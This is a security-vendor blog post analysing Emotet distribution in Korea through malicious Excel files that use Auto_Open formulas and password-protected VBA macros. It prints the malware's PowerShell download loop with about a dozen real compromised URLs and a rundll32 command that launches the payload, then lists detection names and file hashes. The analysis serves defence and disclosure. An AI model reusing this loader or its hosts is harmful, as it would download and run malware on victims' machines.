Emotet Being Distributed in Korea via Excel Files

The ASEC analysis team has recently discovered the active distribution of malicious Excel files that download Emotet. The team has introduced this type of malware in the post ‘Emotet Being Distributed Using Excel Files‘ last month. At that time, only types of Excel files that use macro sheets were found, but recently, there have been types that perform malicious behaviors using VBA macro.

The distributed email had a compressed file as an attachment, and it contained an Excel file that is locked with a password.

Figure 1. Distributed email 1

Figure 2. Distributed email 2

Figure 3. Excel file inside the compressed file

The Scan_2456321.xlsx file executes the malicious command via the formula in the cell set as Auto_Open just like in the previous case.

Figure 4. Scan_2456321.xlsx file

As shown in Figure 5, a formula exists in the hidden sheet, and when the user clicks Enable Content, a formula that downloads additional files is created.

Figure 5. Formula in Scan_2456321.xlsx

The additionally created formula is as shown below. This formula is then executed to download Emotet from a certain address, saves it as iix.ocx, and executes it.

Figure 6. Additionally created formula

Another Excel file 4968839233806560.xls includes a VBA macro unlike the Excel file above. However, the image below is included inside the Excel file to prompt the users to enable macro.

Figure 7. Image in 4968839233806560.xls

This Excel file has a password-locked VBAProject with a hidden macro code.

Figure 8. VBAProject locked with a password

The following VBA macro is found upon entering the password. This macro was designed to automatically execute the malicious macro code when the user clicks Enable Content through the Workbook_Open() function.

Figure 9. VBA macro code

When the macro is executed, it creates wetidjks.vbs and jledshf.bat in the programdata folder, and executes the wetidjks.vbs file.

wetidjks.vbs is obfuscated and upon executing it, it executes jledshf.bat and performs the command below to execute the downloaded Emotet.

  • cmd /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd

A powershell command encoded with base64 exists in jledshf.batk and upon executing it, Emotet is downloaded from the address below and saved to the programdata folder as vbkwk.dll.

powershell –enc $gjsebngukiwug3kwjd="http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/".spLiT(",");
fOreaCh($hklwRHJSe4h in $gjsebngukiwug3kwjd){
	$Js3hlskdcfk="vbkwk";
	$sdewHSw3gkjsd=Get-Random;
	$IDrfghsbzkjxd="c:\programdata\"+$Js3hlskdcfk+".dll";
	iNvOke-wEbreQuesT -uRi $hklwRHJSe4h -ouTfiLe $IDrfghsbzkjxd;
	if(test-pAtH $IDrfghsbzkjxd){
		if((get-iTem $IDrfghsbzkjxd).Length -ge 50000){break;}
	}
}

When the Emotet downloaded through the Excel file is executed, it attempts to access multiple C&C server URLs. If it succeeds, it can perform malicious behaviors such as receiving commands from the attacker to download additional malware.

As Excel files that download Emotet are being actively distributed recently, and various methods are used to download the malware, user caution is required. As always stressed, users should refrain from opening attachment of emails from unknown senders and files from unknown sources. Users must also refrain from enabling macro to avoid malicious macro from being enabled automatically.

 AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below.

[File Detection]
Trojan/XLS.PsExec
Trojan/XLS.Agent
Trojan/Win.Emotet

[Behavior Detection]
Execution/MDP.Rundll.M4179

[IOC Info]
8b7a08559eec18b8ccabe70289e67b94
c4f65501d52cbfa5d454d06309545720
c52358a4a8d0b09e98382e5ba4a143a4
c2de652b094b538070e754ee09f3c737

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Emotet Being Distributed in Korea via Excel Files appeared first on ASEC BLOG.

Article Link: Emotet Being Distributed in Korea via Excel Files - ASEC BLOG